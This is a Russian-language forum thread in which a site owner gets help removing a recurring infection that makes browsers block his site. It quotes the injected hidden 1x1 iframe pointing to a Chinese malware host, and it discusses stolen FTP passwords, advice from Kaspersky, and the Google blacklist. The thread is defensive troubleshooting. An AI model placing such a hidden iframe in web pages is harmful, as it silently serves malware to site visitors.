Ребята, кто шарит во всей этой электронной мути, подскажите. Захожу на свой сайт хххххххххх, а мне там вылазиет вот такая фигня:
Имеется информация, что этот сайт атакует компьютеры
Имеется информация о том, что сайт хххххххххх используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.
Сайты, атакующие компьютеры, пытаются установить программное обеспечение, которое похищает персональную информацию, вредит вашей системе или использует ваш компьютер для атак на другие компьютеры.
Некоторые сайты намеренно созданы для распространения зловредного программного обеспечения, однако многие сайты были взломаны и делают это без ведома или разрешения своих владельцев.
Причем у сайта два доменных имени, захожу на второе имя уууууууууууу, там все нормально. Что может быть и как победить сей недуг? Катавасия длится уже с месяц. Мой друган скачал весь сайт, проверил антивиром, чтото там нашел и удалил, удалил с сервака оригинал и залил сайт обратно. Ничего не изменилось. Так и вылазиет это сообщение о блокировке. А по имени уууууууууу ведь все нормально заходит, даже когда там реально какойто вирус был. Вообщем, мне надо чтоб люди могли заходить на сайт хххххххххххх. Кто чем может помоч???
Если кто по доброте душевной сможет решить проблему, скину в личку первое (проблемное) и второе (нормальное) доменные имена.
Эмм.. может, какая то шняга индексировала сайт xxxxxx в список "неблагонадежных", тем более что там вирь был? Пришли в личку имена, я попробую.
FildSnild отправил, спасибо
Блин, ледиперпл тут залогинилась уже. Сейчас посмотрю.
Вот он у тебя сидит в коде:
<iframe src="http://internetnamestore.cn/in.cgi?income27" width=1 height=1 style="visibility: hidden">
FildSnild спасибо еще раз, отдал твои исследования челу, который хоть чтото в этом смыслит, сидит разбирается
Чел мне сказал что уже удалял эту фигню, откуда опять появилась, неизвестно. Еще раз удалил.
В хостере дырка значит. Или права доступа неправильно стоят.
Тут кой чего есть:
http://dataword.info/virus-alert.php
может попробовать пароль сменить. А сайтик с вирем - китайский.
Каков тогда выход из положения?
Щас ссылочку твою почитаем
заходим через мазила фиерфокс, есть вирус, заходим через эксплоер нет вируса, шайтан
avante
Не, не так. Вирус есть в обоих случаях. Просто когда заходишь через експлорер, вирь юзает дырку в нем, и ты его не видишь (а комп уже заражен). В мазиле и опере таких дырок нету, поэтому предлагает скачать файл.
Какой выход из положения я не знаю, попробуй пароль поменять к сайту. Судя по описанию, вирь пароль уже украл от твоего ресурса, и теперь через ftpшник закачивает код в индекс.хтмл.
Вообщем проблему не победил , удаляем тот вирус, удаляем с сервака старый сайт, заливаем новый-вылеченный, а он тут же выдает что сайт заблакирован и в коде опять сидит вирь , тут же сразуже че за фигня?? пароль сменили. Есть еще у кого какие мысли ?????
avante
Написал знакомому из лаборатории Касперского, думаю поможет.
Вот ответ Касперский лаб, как я и предполагал с паролем:
Цитата |
Привет, Вот дословно ответ от эксперта Вариантов не много: 1. Пароль от ftp сайта утёк. Надо менять пароль и убедиться что на машине нет троя уводящего пароли. 2. Хакнули хостера и надо разбираться с владельцем сервера. 3. На машине пользователя стоит троян который подменяет html на лету. Проверить можно закачав на ftp незараженные страницы в zip и разархивировав там удлаенно по ssh. Проше говоря. Надо установить антивирус на компьютер твоего друга, сделать полную проверку компьютера, сменить пароль на ftp и попробовать снова. Если не получится действовать по инструкции описанной выше. Максим |
Ого, спасибо, уже тяжелую артиллерию подключили, будем разбираться, о результатах отпишусь
Отчитываюсь: владелец сервака проверил свой сервер, нашли какуюто фигню каторая штмл код правит, но к моему сайту это не относилось. На том компе, на котором проверяют и перезаливают мой сайт стоит нод32 лицензионный новый, сам комп не заражон, а вот на сайте опять удаляют тот же вирь что был и до этого (который уже не однократно удаляли) пароли сменили. Как уверяет владелец сервера, на моем сайте чисто, а вот гугл занес мой сайт в черный список и теперь фиг знает сколько он будет в этом списке. Как сообщить в гугл чтоб они мой сайт из списка удалили? знает ктонибудь?
Мм.. ну вот сейчас я на него залез - враждебного кода нет, все открывается. Насчет гугля не знаю.
FildSnild тоесть сайт открывается нормально? без предупреждения о заразности сайта? я вот пробую зайти, он мне окошко о блокировке выдает, шайтан
Цитата (avante @ 15.04.2009 - 17:55) |
FildSnild тоесть сайт открывается нормально? без предупреждения о заразности сайта? |
Урааааа, мы победили не только 9 мая, но и буквально на днях. Благодаря FildSnild и еще нескольким моим друзьям, мы таки победили заразу, терроризирующую мой сайт около 2-х месяцев. Наконецто все заработало.
FildSnild спасибо тебе, твои наводки очень помогли.
Ура! Незачто )
Форум Invision Power Board (http://nulled.cc)
© Invision Power Services (http://nulled.cc)